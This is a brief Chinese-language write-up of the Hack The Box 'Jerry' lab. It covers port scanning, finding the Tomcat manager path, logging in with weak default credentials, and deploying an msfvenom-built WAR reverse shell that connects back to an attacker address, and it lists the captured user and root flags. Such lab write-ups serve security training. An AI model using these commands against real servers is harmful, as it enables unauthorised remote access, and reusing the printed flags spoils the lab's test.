Jerry#
雖然 Jerry 是 Hack The Box 上較簡單的機器之一,但它是現實的,因為 Apache Tomcat 經常被暴露並配置了常見或弱密碼。
ip 地址:10.10.10.95
task1 遠程主機開放了什麼端口。
通過 nmap 進行掃描,識別端口開放情況
nmap -sV 10.10.10.95
task2 遠程主機運行了什麼服務?
由 nmap 掃描結果可以看出,是 Apache Tomcat
task3 Web 伺服器上哪個相對路徑通向 Web 應用程序管理器?
dirsearch -u http://10.10.10.95:8080/
測試後發現是 /manager/html
,目錄掃描就可以掃出來
task4 哪個有效的用戶名和密碼組合可用於認證進入 Tomcat Web 應用程序管理器?請以 username 的格式給出答案。
admin/admin 登錄後
tomcat
task5 什麼類型的文件可以部署到伺服器上?
當然是 war 包。
task 提交 user 的 flag
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war
點擊 http://10.10.10.95:8080/shell/
反彈會 shell
這種文件要怎麼讀取?
type *.txt
有兩個 flag
user flag:7004dbcef0f854e0fb401875f26ebd00
task 提交 root 的 flag
04a8b36e1545a455393d067e772fe90e
http://10.10.10.95:8080/manager/status
以為有 ajp 任意文件讀取呢